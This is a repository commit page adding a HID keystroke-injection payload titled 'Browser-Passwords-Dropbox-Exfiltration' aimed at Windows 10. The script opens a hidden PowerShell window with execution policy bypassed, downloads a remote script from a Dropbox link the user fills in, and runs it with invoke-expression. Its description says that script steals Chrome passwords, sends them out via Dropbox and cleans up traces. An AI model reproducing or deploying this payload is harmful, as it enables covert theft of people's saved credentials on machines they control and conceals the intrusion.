Create payload.txt
DIYS.py
GitHub
parent
4626f3c9c1
commit
bf506c8368
|
|
@ -0,0 +1,28 @@
|
||||||
|
#########################################################################################################
|
||||||
|
# | #
|
||||||
|
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||||
|
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||||
|
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||||
|
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||||
|
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
|
||||||
|
# Mode : HID | |_| |___/ #
|
||||||
|
# Props : I am Jakoby, NULLSESSION0X | #
|
||||||
|
# | #
|
||||||
|
#########################################################################################################
|
||||||
|
|
||||||
|
REM Title: Browser-Passwords-Dropbox-Exfiltration
|
||||||
|
REM Author: DIYS.py
|
||||||
|
REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
|
||||||
|
REM Then it cleans up traces of what you have done after.
|
||||||
|
REM Target: Windows 10 (PowerShell + Chrome)
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Credentials, Exfiltration
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 3000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
|
||||||
|
|
||||||
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||||
Loading…
Reference in New Issue